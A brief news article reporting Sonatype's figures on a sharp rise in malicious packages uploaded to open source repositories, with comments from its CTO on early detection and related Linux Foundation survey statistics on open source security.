The volume of malicious activity targeting upstream open source code repositories has hit triple-digit growth over the past three years, according to Sonatype.
The security vendor claimed in newly released data to have detected a 700% rise in attacks designed to plant malware in software components, which can cause havoc when these components are used by DevOps teams downstream.
Sonatype identified over 55,000 newly published packages as malicious in various open source repositories over the past year, and nearly 95,000 over the past three years.
“Almost every modern business relies on open source. Clearly, the use of open source repositories as an entry point for malicious attacks shows no signs of slowing down – making the early detection of both known and unknown security vulnerabilities more important than ever,” said Brian Fox, co-founder and CTO of Sonatype.
“Stopping malicious components before they come in the door is a fundamental element of risk prevention and should be a part of every conversation around protecting software supply chains.”
Sonatype said prevention of this sort is the only way to go, because if a malicious component is downloaded onto a developer machine – even if it isn’t used in a finished product – the damage may already have been done.
The scale of the challenge is also too great for manual threat prevention, the vendor added.
In fact, according to Sonatype’s 2021 State of the Software Supply Chain report, global developers were estimated to have borrowed over 2.2 trillion open source packages or components from third-party ecosystems last year in order to accelerate time-to-market.
The story chimes with a report from the Linux Foundation earlier this year which claimed that over two-fifths (41%) of organizations do not have confidence in their open source security, and only half (49%) claim to even have a policy covering the use of open source.
It also revealed that the average application development project contains 49 vulnerabilities spanning 80 direct dependencies, while 40% of all bugs were present in harder-to-find indirect dependencies.